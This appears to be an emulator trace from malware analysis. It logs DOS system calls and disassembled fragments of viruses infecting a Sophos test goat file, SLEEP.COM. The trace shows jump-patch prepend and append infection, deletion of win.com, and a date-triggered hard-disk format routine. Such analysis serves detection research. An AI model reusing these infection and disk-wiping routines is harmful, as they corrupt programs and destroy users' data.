2018-12-25T12:22:18.886758216Z 63 PC: 14834 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:18.893739552Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:18.895684795Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:18.898964802Z 59 PC: 148f7 | Change current directory
2018-12-25T12:22:18.90416511Z 62 PC: 148b0 | Close file
2018-12-25T12:22:18.905787944Z 26 PC: 148b7 | Set disk transfer address
2018-12-25T12:22:18.907648301Z 59 PC: 148bf | Change current directory
2018-12-25T12:22:18.912245856Z 26 PC: 145e2 | Set disk transfer address
2018-12-25T12:22:18.913543551Z 71 PC: 14682 | Get current directory
2018-12-25T12:22:18.917286937Z 78 PC: 145f1 | Find first file
2018-12-25T12:22:18.92373984Z 61 PC: 14604 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:18.936161667Z 63 PC: 14610 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:22:18.943551273Z 66 PC: 14630 | Move file pointer
2018-12-25T12:22:18.94494697Z 64 PC: 1463d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:22:18.948156466Z 66 PC: 14648 | Move file pointer
2018-12-25T12:22:18.95073852Z 64 PC: 14655 | Write file or device (Write 465 bytes on handle 5)
2018-12-25T12:22:19.021701184Z 62 PC: 14659 | Close file
2018-12-25T12:22:19.036645581Z 59 PC: 14661 | Change current directory
2018-12-25T12:22:19.041792606Z 65 PC: 1468e | Delete file (Filename = 'c:\windows\win.com')
2018-12-25T12:22:19.39583342Z 59 PC: 1466e | Change current directory
2018-12-25T12:22:19.399323919Z 26 PC: 14677 | Set disk transfer address
2018-12-25T12:22:19.401251859Z 71 PC: 1441e | Get current directory
2018-12-25T12:22:19.408572599Z 26 PC: 1443d | Set disk transfer address
2018-12-25T12:22:19.410819171Z 78 PC: 14447 | Find first file
2018-12-25T12:22:19.418816736Z 61 PC: 1455c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.429463871Z 63 PC: 1456b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:19.437366396Z 61 PC: 14471 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.445325426Z 63 PC: 14480 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.449687352Z 66 PC: 1448b | Move file pointer
2018-12-25T12:22:19.451532615Z 44 PC: 14491 | Get time 0x14491: inc dl
0x14493: mov byte ptr [bp + 0x2d9], dl
0x14497: pushaw
0x14498: call 0x243f2
0x1449b: popaw
0x1449c: mov byte ptr [bp + 0x330], 0xe9
0x144a1: mov ax, word ptr [bp + 0x34e]
0x144a5: sub ax, 3
0x144a8: mov word ptr [bp + 0x331], ax
0x144ac: mov word ptr [bp + 0x333], 0x60
0x144b2: mov ah, 0x40
0x144b4: mov cx, 4
0x144b7: lea dx, word ptr [bp + 0x330]
0x144bb: int 0x21
0x144bd: mov ax, 0x4202
0x144c0: xor cx, cx
0x144c2: xor dx, dx
0x144c4: int 0x21
0x144c6: mov ah, 0x40
0x144c8: mov cx, 0x1d6
2018-12-25T12:22:19.45458888Z 64 PC: 144bd | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:19.458522147Z 66 PC: 144c6 | Move file pointer
2018-12-25T12:22:19.460345112Z 64 PC: 144d1 | Write file or device (Write 470 bytes on handle 6)
2018-12-25T12:22:19.655754789Z 42 PC: 144da | Get date 0x144da: cmp dx, 0x71a
0x144de: je 0x1453f
0x144e0: cmp dx, 0xc06
0x144e4: je 0x1453f
0x144e6: lea dx, word ptr [bp + 0x29f]
0x144ea: mov ah, 0x3b
0x144ec: int 0x21
0x144ee: jb 0x144f3
0x144f0: jmp 0x1443d
0x144f3: mov ax, 0x5701
0x144f6: mov dx, word ptr [bp + 0x326]
0x144fa: mov cx, word ptr [bp + 0x324]
0x144fe: int 0x21
0x14500: mov ah, 0x3e
0x14502: int 0x21
0x14504: mov ax, 0x4301
0x14507: lea dx, word ptr [bp + 0x352]
0x1450b: xor ch, ch
0x1450d: mov cl, byte ptr [bp + 0x323]
0x14511: int 0x21
2018-12-25T12:22:19.65908923Z 64 PC: 1454f | Write file or device (Write 44 bytes on handle 1)
2018-12-25T12:22:19.664144125Z 87 PC: 14500 | Get or set file date and time
2018-12-25T12:22:19.668262406Z 62 PC: 14504 | Close file
2018-12-25T12:22:19.766348006Z 67 PC: 14513 | Get or set file attributes
2018-12-25T12:22:19.776126448Z 59 PC: 1451b | Change current directory
2018-12-25T12:22:19.780757284Z 26 PC: 14527 | Set disk transfer address
2018-12-25T12:22:19.78271306Z 37 PC: 14268 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:22:19.785294532Z 37 PC: 1426c | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:22:19.786680627Z 26 PC: 14274 | Set disk transfer address
2018-12-25T12:22:19.78797925Z 71 PC: 14281 | Get current directory
2018-12-25T12:22:19.791700683Z 42 PC: 14286 | Get date 0x14286: cmp dl, 6
0x14289: jne 0x142ad
0x1428b: mov ax, 0x500
0x1428e: mov cx, 0
0x14291: mov dh, 0
0x14293: mov dl, 0x80
0x14295: int 0x13
0x14297: jb 0x1425a
0x14299: mov ah, 9
0x1429b: lea dx, word ptr [si + 0x27d]
0x1429f: int 0x21
0x142a1: nop
0x142a2: jmp 0x142a1
0x142a4: mov cx, 0x4eb
0x142a7: jmp 0x142a5
0x142a9: cli
0x142aa: jmp 0x142a0
0x142ac: iret
0x142ad: lea dx, word ptr [si + 0x25c]
0x142b1: xor cx, cx
2018-12-25T12:22:19.794934128Z 62 PC: 1434c | Close file
2018-12-25T12:22:19.798215031Z 59 PC: 14354 | Change current directory
2018-12-25T12:22:19.800878568Z 26 PC: 1435b | Set disk transfer address
2018-12-25T12:22:19.802226596Z 48 PC: 1404a | Get DOS version
2018-12-25T12:22:19.803487319Z 47 PC: 14056 | Get disk transfer address
2018-12-25T12:22:19.805226452Z 26 PC: 14063 | Set disk transfer address
2018-12-25T12:22:19.806422361Z 78 PC: 140d6 | Find first file
2018-12-25T12:22:19.813286262Z 67 PC: 1411a | Get or set file attributes
2018-12-25T12:22:19.820193709Z 67 PC: 14128 | Get or set file attributes
2018-12-25T12:22:20.138635339Z 61 PC: 14130 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.15325462Z 87 PC: 1413c | Get or set file date and time
2018-12-25T12:22:20.158527332Z 44 PC: 14146 | Get time 0x14146: mov ah, 0x3f
0x14148: mov cx, 3
0x1414b: lea dx, word ptr [si + 0x13]
0x1414e: int 0x21
0x14150: jb 0x14199
0x14152: cmp ax, 3
0x14155: jne 0x14199
0x14157: mov ax, 0x4202
0x1415a: xor cx, cx
0x1415c: xor dx, dx
0x1415e: int 0x21
0x14160: jb 0x14199
0x14162: mov cx, ax
0x14164: sub ax, 3
0x14167: mov word ptr [si + 0x17], ax
0x1416a: add cx, 0x2bd
0x1416e: mov word ptr [si - 0x1bc], cx
0x14172: mov ah, 0x40
0x14174: mov cx, 0x1e1
0x14177: nop
2018-12-25T12:22:20.164130573Z 63 PC: 14150 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:20.176139015Z 66 PC: 14160 | Move file pointer
2018-12-25T12:22:20.178769498Z 64 PC: 1417e | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.190657899Z 66 PC: 1418d | Move file pointer
2018-12-25T12:22:20.19232679Z 64 PC: 14199 | Write file or device (Write 3 bytes on handle 6)
2018-12-25T12:22:20.197589945Z 87 PC: 141aa | Get or set file date and time
2018-12-25T12:22:20.200350551Z 62 PC: 141ae | Close file
2018-12-25T12:22:20.209677148Z 67 PC: 141b9 | Get or set file attributes
2018-12-25T12:22:20.222715526Z 26 PC: 141c4 | Set disk transfer address
2018-12-25T12:22:20.225400687Z 26 PC: 13e67 | Set disk transfer address
2018-12-25T12:22:20.226727342Z 78 PC: 13ea5 | Find first file
2018-12-25T12:22:20.234594517Z 61 PC: 13eb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.243134599Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-25T12:22:20.246777694Z 66 PC: 13ed9 | Move file pointer
2018-12-25T12:22:20.248410047Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.252920217Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.264240524Z 66 PC: 13f02 | Move file pointer
2018-12-25T12:22:20.265922784Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.269982211Z 62 PC: 13e99 | Close file
2018-12-25T12:22:20.279891963Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.283301673Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.29130881Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.299035383Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.301442798Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.305075033Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.309245082Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.310856247Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.313958752Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.325258425Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.328660022Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.336181746Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.344811134Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.3469937Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.350374042Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.360184852Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.361965366Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.369800236Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.379608732Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.382515849Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.386848837Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.395549891Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.397674382Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.402127119Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.412525479Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.414993954Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.424323733Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.435806719Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.439078514Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.446781211Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.455028927Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.456660914Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.459720637Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.471985758Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.473807437Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.481478904Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.491721026Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.49519432Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.502791899Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.511716802Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.514146987Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.51758242Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.528383957Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.530577692Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.538352393Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.548722053Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.552695513Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.560496034Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.568409401Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.570633756Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.574086545Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.583637185Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.586376726Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.594104993Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.604331389Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.608833875Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.616600368Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.622159782Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.624550523Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.630772388Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.636989343Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.639907751Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.642903825Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.651543839Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.655862564Z 26 PC: 13e7b | Set disk transfer address
2018-12-25T12:22:20.657540576Z 9 PC: 12a85 | Display string (String= 'Sophos Ltd, Oxford sacrificial COM goat 1400H bytes long ')
2018-12-25T12:22:20.665554228Z 0 PC: 12a89 | Program terminate

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":9008,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:22:19.165685123Z 26 PC: 147b3 | Set disk transfer address
2018-12-25T12:22:19.16824212Z 250 PC: 147bb | UNKNOWN!
2018-12-25T12:22:19.169096467Z 71 PC: 147c6 | Get current directory
2018-12-25T12:22:19.172618618Z 25 PC: 147ca | Get default drive
2018-12-25T12:22:19.174271755Z 78 PC: 147e2 | Find first file
2018-12-25T12:22:19.180840358Z 61 PC: 147f0 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.18818533Z 66 PC: 14803 | Move file pointer
2018-12-25T12:22:19.190140561Z 62 PC: 148d3 | Close file
2018-12-25T12:22:19.192028927Z 79 PC: 148db | Find next file
2018-12-25T12:22:19.19489064Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.20244103Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.204697235Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.206535829Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.209222604Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.216853561Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.218652201Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.220574352Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.223671149Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.230535576Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.231922573Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.234694Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.238675772Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.252879027Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.255017244Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.257120248Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.259884177Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.267391995Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.269091039Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.271063933Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.274839024Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.282123737Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.283665811Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.285585757Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.288327666Z 61 PC: 147f0 | Open file (See above)
2018-12-25T12:22:19.295469303Z 66 PC: 14803 | Move file pointer (See above)
2018-12-25T12:22:19.296979822Z 66 PC: 14824 | Move file pointer
2018-12-25T12:22:19.299047355Z 63 PC: 14834 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:19.301719727Z 62 PC: 148d3 | Close file (See above)
2018-12-25T12:22:19.303628397Z 79 PC: 148db | Find next file (See above)
2018-12-25T12:22:19.306542593Z 59 PC: 148f7 | Change current directory
2018-12-25T12:22:19.312165356Z 62 PC: 148b0 | Close file
2018-12-25T12:22:19.313454883Z 26 PC: 148b7 | Set disk transfer address
2018-12-25T12:22:19.314831555Z 59 PC: 148bf | Change current directory
2018-12-25T12:22:19.319142262Z 26 PC: 145e2 | Set disk transfer address
2018-12-25T12:22:19.320091394Z 71 PC: 14682 | Get current directory
2018-12-25T12:22:19.323540245Z 78 PC: 145f1 | Find first file
2018-12-25T12:22:19.329724487Z 61 PC: 14604 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.336731727Z 63 PC: 14610 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:22:19.343835867Z 66 PC: 14630 | Move file pointer
2018-12-25T12:22:19.345276278Z 64 PC: 1463d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:22:19.348032527Z 66 PC: 14648 | Move file pointer
2018-12-25T12:22:19.349822198Z 64 PC: 14655 | Write file or device (Write 465 bytes on handle 5)
2018-12-25T12:22:19.394825406Z 62 PC: 14659 | Close file
2018-12-25T12:22:19.407106427Z 59 PC: 14661 | Change current directory
2018-12-25T12:22:19.413209829Z 65 PC: 1468e | Delete file (Filename = 'c:\windows\win.com')
2018-12-25T12:22:19.766463983Z 59 PC: 1466e | Change current directory
2018-12-25T12:22:19.769113096Z 26 PC: 14677 | Set disk transfer address
2018-12-25T12:22:19.771177374Z 71 PC: 1441e | Get current directory
2018-12-25T12:22:19.7758918Z 26 PC: 1443d | Set disk transfer address
2018-12-25T12:22:19.780079906Z 78 PC: 14447 | Find first file
2018-12-25T12:22:19.787374704Z 61 PC: 1455c | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.797688203Z 63 PC: 1456b | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:22:19.805855122Z 61 PC: 14471 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:19.816866189Z 63 PC: 14480 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:19.821186822Z 66 PC: 1448b | Move file pointer
2018-12-25T12:22:19.823502058Z 44 PC: 14491 | Get time 0x14491: inc dl
0x14493: mov byte ptr [bp + 0x2d9], dl
0x14497: pushaw
0x14498: call 0x243f2
0x1449b: popaw
0x1449c: mov byte ptr [bp + 0x330], 0xe9
0x144a1: mov ax, word ptr [bp + 0x34e]
0x144a5: sub ax, 3
0x144a8: mov word ptr [bp + 0x331], ax
0x144ac: mov word ptr [bp + 0x333], 0x60
0x144b2: mov ah, 0x40
0x144b4: mov cx, 4
0x144b7: lea dx, word ptr [bp + 0x330]
0x144bb: int 0x21
0x144bd: mov ax, 0x4202
0x144c0: xor cx, cx
0x144c2: xor dx, dx
0x144c4: int 0x21
0x144c6: mov ah, 0x40
0x144c8: mov cx, 0x1d6
2018-12-25T12:22:19.826513993Z 64 PC: 144bd | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:19.830737566Z 66 PC: 144c6 | Move file pointer
2018-12-25T12:22:19.833084311Z 64 PC: 144d1 | Write file or device (Write 470 bytes on handle 6)
2018-12-25T12:22:20.138892715Z 42 PC: 144da | Get date 0x144da: cmp dx, 0x71a
0x144de: je 0x1453f
0x144e0: cmp dx, 0xc06
0x144e4: je 0x1453f
0x144e6: lea dx, word ptr [bp + 0x29f]
0x144ea: mov ah, 0x3b
0x144ec: int 0x21
0x144ee: jb 0x144f3
0x144f0: jmp 0x1443d
0x144f3: mov ax, 0x5701
0x144f6: mov dx, word ptr [bp + 0x326]
0x144fa: mov cx, word ptr [bp + 0x324]
0x144fe: int 0x21
0x14500: mov ah, 0x3e
0x14502: int 0x21
0x14504: mov ax, 0x4301
0x14507: lea dx, word ptr [bp + 0x352]
0x1450b: xor ch, ch
0x1450d: mov cl, byte ptr [bp + 0x323]
0x14511: int 0x21
2018-12-25T12:22:20.142467243Z 59 PC: 144ee | Change current directory
2018-12-25T12:22:20.148239786Z 87 PC: 14500 | Get or set file date and time
2018-12-25T12:22:20.149546456Z 62 PC: 14504 | Close file
2018-12-25T12:22:20.156444017Z 67 PC: 14513 | Get or set file attributes
2018-12-25T12:22:20.165718364Z 59 PC: 1451b | Change current directory
2018-12-25T12:22:20.168582707Z 26 PC: 14527 | Set disk transfer address
2018-12-25T12:22:20.169816391Z 37 PC: 14268 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-25T12:22:20.172160939Z 37 PC: 1426c | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-25T12:22:20.173591444Z 26 PC: 14274 | Set disk transfer address
2018-12-25T12:22:20.174717584Z 71 PC: 14281 | Get current directory
2018-12-25T12:22:20.177804519Z 42 PC: 14286 | Get date 0x14286: cmp dl, 6
0x14289: jne 0x142ad
0x1428b: mov ax, 0x500
0x1428e: mov cx, 0
0x14291: mov dh, 0
0x14293: mov dl, 0x80
0x14295: int 0x13
0x14297: jb 0x1425a
0x14299: mov ah, 9
0x1429b: lea dx, word ptr [si + 0x27d]
0x1429f: int 0x21
0x142a1: nop
0x142a2: jmp 0x142a1
0x142a4: mov cx, 0x4eb
0x142a7: jmp 0x142a5
0x142a9: cli
0x142aa: jmp 0x142a0
0x142ac: iret
0x142ad: lea dx, word ptr [si + 0x25c]
0x142b1: xor cx, cx
2018-12-25T12:22:20.179731634Z 78 PC: 142b7 | Find first file
2018-12-25T12:22:20.187588946Z 61 PC: 142c2 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.192741678Z 63 PC: 142d1 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:20.198329185Z 87 PC: 142ec | Get or set file date and time
2018-12-25T12:22:20.199715008Z 66 PC: 142fc | Move file pointer
2018-12-25T12:22:20.201036485Z 63 PC: 14305 | Read file or device (Read 2 bytes on handle 6)
2018-12-25T12:22:20.206808715Z 44 PC: 1430f | Get time 0x1430f: or dx, dx
0x14311: je 0x1430b
0x14313: mov word ptr [si + 0x2df], dx
0x14317: xor dx, dx
0x14319: xor cx, cx
0x1431b: mov ax, 0x4202
0x1431e: int 0x21
0x14320: or dx, dx
0x14322: jne 0x142d6
0x14324: cmp ah, 0xfe
0x14327: jae 0x142d6
0x14329: call 0x24240
0x1432c: mov ax, 0x4200
0x1432f: xor cx, cx
0x14331: mov dx, 1
0x14334: int 0x21
0x14336: mov ah, 0x40
0x14338: lea dx, word ptr [si + 0x2e4]
0x1433c: mov cx, 2
0x1433f: int 0x21
2018-12-25T12:22:20.208975113Z 66 PC: 14320 | Move file pointer
2018-12-25T12:22:20.21034634Z 64 PC: 14252 | Write file or device (Write 476 bytes on handle 6)
2018-12-25T12:22:20.217329767Z 66 PC: 14336 | Move file pointer
2018-12-25T12:22:20.218557334Z 64 PC: 14341 | Write file or device (Write 2 bytes on handle 6)
2018-12-25T12:22:20.220764568Z 87 PC: 14348 | Get or set file date and time
2018-12-25T12:22:20.222801228Z 62 PC: 1434c | Close file
2018-12-25T12:22:20.22865651Z 59 PC: 14354 | Change current directory
2018-12-25T12:22:20.230238614Z 26 PC: 1435b | Set disk transfer address
2018-12-25T12:22:20.231930447Z 48 PC: 1404a | Get DOS version
2018-12-25T12:22:20.233075575Z 47 PC: 14056 | Get disk transfer address
2018-12-25T12:22:20.234346132Z 26 PC: 14063 | Set disk transfer address
2018-12-25T12:22:20.23571086Z 78 PC: 140d6 | Find first file
2018-12-25T12:22:20.241240975Z 67 PC: 1411a | Get or set file attributes
2018-12-25T12:22:20.245103062Z 67 PC: 14128 | Get or set file attributes
2018-12-25T12:22:20.254403062Z 61 PC: 14130 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.260604116Z 87 PC: 1413c | Get or set file date and time
2018-12-25T12:22:20.262095147Z 44 PC: 14146 | Get time 0x14146: mov ah, 0x3f
0x14148: mov cx, 3
0x1414b: lea dx, word ptr [si + 0x13]
0x1414e: int 0x21
0x14150: jb 0x14199
0x14152: cmp ax, 3
0x14155: jne 0x14199
0x14157: mov ax, 0x4202
0x1415a: xor cx, cx
0x1415c: xor dx, dx
0x1415e: int 0x21
0x14160: jb 0x14199
0x14162: mov cx, ax
0x14164: sub ax, 3
0x14167: mov word ptr [si + 0x17], ax
0x1416a: add cx, 0x2bd
0x1416e: mov word ptr [si - 0x1bc], cx
0x14172: mov ah, 0x40
0x14174: mov cx, 0x1e1
0x14177: nop
2018-12-25T12:22:20.264403109Z 63 PC: 14150 | Read file or device (Read 3 bytes on handle 6)
2018-12-25T12:22:20.271268873Z 66 PC: 14160 | Move file pointer
2018-12-25T12:22:20.272851507Z 64 PC: 1417e | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.279081161Z 66 PC: 1418d | Move file pointer
2018-12-25T12:22:20.281064319Z 64 PC: 14199 | Write file or device (Write 3 bytes on handle 6)
2018-12-25T12:22:20.283177114Z 87 PC: 141aa | Get or set file date and time
2018-12-25T12:22:20.28472278Z 62 PC: 141ae | Close file
2018-12-25T12:22:20.290678796Z 67 PC: 141b9 | Get or set file attributes
2018-12-25T12:22:20.297519399Z 26 PC: 141c4 | Set disk transfer address
2018-12-25T12:22:20.298634033Z 26 PC: 13e67 | Set disk transfer address
2018-12-25T12:22:20.300091201Z 78 PC: 13ea5 | Find first file
2018-12-25T12:22:20.304254822Z 61 PC: 13eb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:22:20.312279419Z 63 PC: 13ec0 | Read file or device (Read 4 bytes on handle 6)
2018-12-25T12:22:20.317238757Z 66 PC: 13ed9 | Move file pointer
2018-12-25T12:22:20.318423423Z 64 PC: 13eee | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.323482749Z 64 PC: 13ef9 | Write file or device (Write 481 bytes on handle 6)
2018-12-25T12:22:20.329422603Z 66 PC: 13f02 | Move file pointer
2018-12-25T12:22:20.331446593Z 64 PC: 13f24 | Write file or device (Write 4 bytes on handle 6)
2018-12-25T12:22:20.333487404Z 62 PC: 13e99 | Close file
2018-12-25T12:22:20.339922763Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.343917682Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.356655498Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.368554388Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.376256825Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.380920832Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.383407257Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.385422118Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.388517706Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.394606437Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.398687471Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.40358534Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.408599411Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.4106925Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.413405701Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.419916425Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.421903195Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.427243823Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.433598358Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.436857001Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.44297933Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.449268932Z 66 PC: 13ed9 | Move file pointer (See above)
2018-12-25T12:22:20.451343629Z 64 PC: 13eee | Write file or device (See above)
2018-12-25T12:22:20.453511829Z 64 PC: 13ef9 | Write file or device (See above)
2018-12-25T12:22:20.460892564Z 66 PC: 13f02 | Move file pointer (See above)
2018-12-25T12:22:20.464123103Z 64 PC: 13f24 | Write file or device (See above)
2018-12-25T12:22:20.47288809Z 62 PC: 13e99 | Close file (See above)
2018-12-25T12:22:20.483466236Z 79 PC: 13ea5 | Find next file (See above)
2018-12-25T12:22:20.488965396Z 61 PC: 13eb1 | Open file (See above)
2018-12-25T12:22:20.497357682Z 63 PC: 13ec0 | Read file or device (See above)
2018-12-25T12:22:20.505700443Z 66 PC: 13ed9 | Move file pointer (See above)
